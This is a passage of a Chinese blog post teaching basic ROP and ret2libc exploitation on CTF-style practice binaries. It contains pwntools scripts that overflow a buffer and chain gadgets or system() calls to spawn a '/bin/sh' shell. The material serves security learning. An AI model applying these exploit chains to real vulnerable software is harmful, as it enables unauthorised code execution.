<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./rop&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_eax_ret = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx_ret = <span class="number">0x0806eb90</span></span><br><span class="line">int_0x80 = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x80be408</span></span><br><span class="line">payload = flat([<span class="string">&#x27;A&#x27;</span> * <span class="number">112</span>, pop_eax_ret, <span class="number">0xb</span>,pop_edx_ecx_ebx_ret, <span class="number">0</span>, <span class="number">0</span>, binsh, int_0x80])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="pwn3_1"><a class="markdownIt-Anchor" href="#pwn3_1"></a> pwn3_1</h4>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111233344182.png" alt="image-20230111233344182" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230111233420990.png" alt="image-20230111233420990" /></p>
<h2 id="ret2libc"><a class="markdownIt-Anchor" href="#ret2libc"></a> ret2libc</h2>
<h3 id="原理-4"><a class="markdownIt-Anchor" href="#原理-4"></a> 原理：</h3>
<p>ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system(“/bin/sh”)，故而此时我们需要知道 system 函数的地址。</p>
<h3 id="练习-4"><a class="markdownIt-Anchor" href="#练习-4"></a> 练习：</h3>
<h4 id="ret2libc1有binsh和system函数"><a class="markdownIt-Anchor" href="#ret2libc1有binsh和system函数"></a> ret2libc1（有’/bin/sh‘和system函数）</h4>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112000249091.png" alt="image-20230112000249091" /></p>
<p>找到ststem函数的地址和’/bin/sh‘的地址</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112000212977.png" alt="image-20230112000212977" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112000423520.png" alt="image-20230112000423520" /></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">binsh_addr = <span class="number">0x8048720</span></span><br><span class="line">system_plt = <span class="number">0x8048460</span></span><br><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * <span class="number">112</span>, system_plt, <span class="string">&#x27;b&#x27;</span> * <span class="number">4</span>, binsh_addr])</span><br><span class="line"><span class="comment">#&#x27;如果是正常调用 system 函数，我们调用的时候会有一个对应的返回地址，这里以&#x27;bbbb&#x27; 作为虚假的地址，其后参数对应的参数内容。</span></span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h4 id="ret2libc2有system函数无binsh"><a class="markdownIt-Anchor" href="#ret2libc2有system函数无binsh"></a> ret2libc2(有system函数无’/bin/sh’)</h4>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112003104812.png" alt="image-20230112003104812" /></p>
<p>没有开PIE，地址固定，所以可以将’bin/sh’写在bss段上</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112005612873.png" alt="image-20230112005612873" /></p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112005755633.png" alt="image-20230112005755633" /></p>
<p>思路：通过gets函数溢出，再次调用gets函数，使得用户可以输入’/bin/sh‘，并通过gadget将’/bin/sh’写进bss段的buf2（<em>不写在栈上是由于栈的地址不可控，而没有开PIE时，bss段地址时不变的</em>），再通过调用system函数，执行system(‘/bin/sh’)</p>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112011519750.png" alt="image-20230112011519750" /></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc2&#x27;</span>)</span><br><span class="line">gets_addr=<span class="number">0x08048460</span></span><br><span class="line">pop_ebp=<span class="number">0x0804843d</span></span><br><span class="line">system_plt =<span class="number">0x8048490</span></span><br><span class="line">bss_buf_addr=<span class="number">0x0804A080</span></span><br><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * <span class="number">112</span>,gets_addr,pop_ebp,bss_buf_addr,system_plt,<span class="string">&#x27;a&#x27;</span> * <span class="number">4</span>,bss_buf_addr])</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">&#x27;/bin/sh&#x27;</span>)<span class="comment">#将&#x27;/bin/sh&#x27;通过上面调用的gets输入到buf2</span></span><br><span class="line">sh.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://pubpic-1300065410.cos.ap-chengdu.myqcloud.com/typora/image-20230112012732272.png" alt="image-20230112012732272" /></p>
<h4 id="ret2libc3无system函数无binsh"><a class="markdownIt-Anchor" href="#ret2libc3无system函数无binsh"></a> ret2libc3(无system函数无’/bin/sh’)</h4>
<p>待完善…（在学）</p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://username.github.io/2023/01/09/%E5%9F%BA%E6%9C%ACROP/" title="基本ROP" target="_blank" rel="external">https://username.github.io/2023/01/09/基本ROP/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/was3d" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/was3d" target="_blank"><span class="text-dark">wased</span><small class="ml-1x">Binary</small></a></h3>
        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2022/09/25/hello-world/" title="Hello World"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn " data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="文章目录" role="button">    <span>[&nbsp;</span><span>文章目录</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/was3d" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: true,
    notify: true,
    appId: 'EliTJKkDiOt8BHeJ4L6GNb8A-gzGzoHsz',
    appKey: 'uVpyvc1dQ8f6U57uHzEHUqaj',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>